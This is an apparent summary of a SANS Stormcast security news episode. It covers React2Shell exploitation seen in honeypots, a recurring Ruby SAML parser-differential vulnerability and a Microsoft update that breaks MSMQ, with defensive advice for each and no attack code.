SANS Stormcast Tuesday, December 16th, 2025: Current React2Shell Example; SAML Woes; MSMQ Issues After Patch;

The latest Stormcast episode highlights the continued chatter around the React2Shell exploit. Honeypot logs show a single, widely‑distributed payload that downloads a file, marks it executable, and then stalls before launch—suggesting a missing component rather than a novel technique. Iranian threat actors were observed scanning for vulnerable hosts, a sign that the exploit is now mature and largely weaponized rather than emerging. For defenders, the takeaway is clear: focus on detecting the characteristic file‑drop behavior and ensure endpoint controls block execution from temporary directories.

The episode also revisits the Ruby SAML vulnerability that resurfaced after an incomplete patch. The root cause lies in the library’s use of two divergent XML parsers, which can interpret the same document differently and allow crafted assertions to slip through verification. A particularly clever twist involves harvesting digitally signed error messages from the SAML server and reusing the server’s signing key to forge user assertions. Organizations deploying SAML should validate inputs before handing them to the library, enforce strict schema checks, and consider alternative implementations that avoid mixed‑parser architectures.

Finally, Microsoft’s December 2025 cumulative update introduced a regression in Message Queuing (MSMQ). Servers running Windows Server 2016, 2019, and Windows 10 clients begin reporting “insufficient memory” or “insufficient disk space” errors despite ample resources, leading to queue failures. No official workaround has been released beyond rolling back the update, leaving enterprises in a precarious position. Administrators are advised to monitor MSMQ health metrics, isolate affected services, and prepare for a hotfix by testing the rollback in a controlled environment while awaiting Microsoft’s remediation.